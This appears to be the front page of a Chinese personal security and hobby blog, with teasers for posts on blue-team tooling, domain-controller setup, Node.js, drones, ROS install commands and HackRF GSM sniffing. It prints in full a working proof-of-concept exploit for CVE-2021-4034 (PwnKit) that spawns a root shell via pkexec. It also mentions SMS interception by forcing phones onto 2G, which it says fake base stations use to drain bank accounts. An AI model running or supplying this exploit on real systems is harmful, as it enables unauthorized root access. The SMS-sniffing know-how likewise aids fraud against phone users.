护网蓝队自动化工具开源-BlueService

引言

​ 在2022年有幸以蓝队身份参加了国护2022的行动,也在护网过程中有幸与永安寺线下面基。由于这是本喵第一次参加蓝队,因此抱着学习的态度,向负责同一个项目的各路大佬学习指教,并在护网期间写出了这样一套开源蓝队自动化工具(其实就是自动封IP,欸嘿)

阅读更多

Windows域控环境搭建教程

因为最近想看一下Windows域在渗透测试中的思路,并且想系统的了解域控,那么首先肯定要自己搭建一次,以此来学习并了解整套环境。

阅读更多

Nodejs学习笔记

此处记录一些NodeJS学习过程中的笔记,并非是完整的入门教程,入门教程可以参照菜鸟教程

阅读更多

pixhawk飞控OUT通道映射关系分析

引言

因为最近在学习pixhawk飞控的相关知识,说实话就是买了个无人机想好好折腾折腾,所以当无人机拿到手的时候,就一直好奇遥控器上这几个按钮和旋钮是干什么的。遥控器型号【FS-i6】

image-20220507102150179

阅读更多

深澜自动登录Python脚本分享

引言

我们学校用的是深澜认证来验证登录校园网的,因为有无图形化的设备自动进行校园网认证的需求,因此通过分析js以及web认证过程的方式用Python写了一个只依赖最基础Python库的登陆脚本,这个脚本在校内2年稳定运行,因为看到网上没有类似的东西,因此分享给大家

阅读更多

ROS学习笔记(持续更新)

安装ROS

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
sudo sh -c 'echo "deb http://packages.ros.org/ros/ubuntu $(lsb_release -sc) main" > /etc/apt/sources.list.d/ros-latest.list'

sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-key F42ED6FBAB17C654

sudo proxychains apt update

sudo proxychains apt install ros-noetic-desktop-full

sudo apt install python3 python3-rosdep2

sudo rosdep init

echo "source /opt/ros/noetic/setup.bash" >> ~/.bashrc

sudo apt install python3-rosinstall python3-rosinstall-generator python3-wstool build-essential

proxychains rosdep update

sudo proxychains apt-get install ros-noetic-roslaunch ros-noetic-rosbash

sudo apt-get install ros-noetic-roslaunch

apt-get install python3-roslaunch

sudo proxychains apt-get install ros-noetic-rqt

sudo proxychains apt-get install ros-noetic-rqt-common-plugins
阅读更多

CVE-2021-4034 Linux提权漏洞EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
/*
* Proof of Concept for PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034) by Andris Raugulis <moo@arthepsy.eu>
* Advisory: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char *shell =
"#include <stdio.h>\n"
"#include <stdlib.h>\n"
"#include <unistd.h>\n\n"
"void gconv() {}\n"
"void gconv_init() {\n"
" setuid(0); setgid(0);\n"
" seteuid(0); setegid(0);\n"
" system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n"
" exit(0);\n"
"}";

int main(int argc, char *argv[]) {
FILE *fp;
system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'");
system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules");
fp = fopen("pwnkit/pwnkit.c", "w");
fprintf(fp, "%s", shell);
fclose(fp);
system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");
char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };
execve("/usr/bin/pkexec", (char*[]){NULL}, env);
}

用HACKRF嗅探GSM短信

简单的记录一下使用HackRF进行GSM短信嗅探的一般步骤,这也是现阶段部分伪基站盗刷用户银行卡,登陆账户的原理,不过利用这种方式还需要配套使用降频器,将手机5G、4G、3G信号屏蔽,强制降为2G网络才可以使用

阅读更多